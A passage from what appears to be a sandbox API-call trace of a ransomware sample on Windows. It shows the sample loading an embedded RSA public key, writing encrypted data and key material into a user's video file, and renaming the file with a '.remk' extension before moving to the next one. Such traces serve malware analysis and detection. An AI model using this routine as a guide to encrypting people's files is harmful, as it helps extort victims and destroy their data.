KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.916] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.916] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.916] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.917] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.917] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.917] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.917] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.917] GetLastError () returned 0x0 [0236.918] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.918] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.918] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.919] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.919] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10340) returned 0x37cf820 [0236.919] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf060 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8d0 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf0a8 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8e8 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.920] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0236.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc930 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc918 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.921] GetCurrentThreadId () returned 0x314 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6560 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0236.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.922] GetCurrentThreadId () returned 0x314 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0236.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc900 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9a8 [0236.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc948 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694f48 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc900 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf0a8 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.926] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x10336, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x10336, lpOverlapped=0x0) returned 1 [0236.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.926] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1033b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.926] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.927] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.927] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.927] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.927] CloseHandle (hObject=0x640) returned 1 [0236.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0236.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0236.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0236.930] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\9L8GIzDkh2buC.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\9l8gizdkh2buc.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\9L8GIzDkh2buC.mp4.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\9l8gizdkh2buc.mp4.remk")) returned 1 [0236.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.931] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0236.933] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572386d0, ftCreationTime.dwHighDateTime=0x1d5de00, ftLastAccessTime.dwLowDateTime=0xaf4c95c0, ftLastAccessTime.dwHighDateTime=0x1d5d984, ftLastWriteTime.dwLowDateTime=0xaf4c95c0, ftLastWriteTime.dwHighDateTime=0x1d5d984, nFileSizeHigh=0x0, nFileSizeLow=0x9643, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cd1puEdABr.mp4", cAlternateFileName="CD1PUE~1.MP4")) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0236.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.933] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\cd1puEdABr.mp4") returned=".mp4" [0236.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\cd1puEdABr.mp4" (normalized: "c:\\users\\5p5nrgjn0js 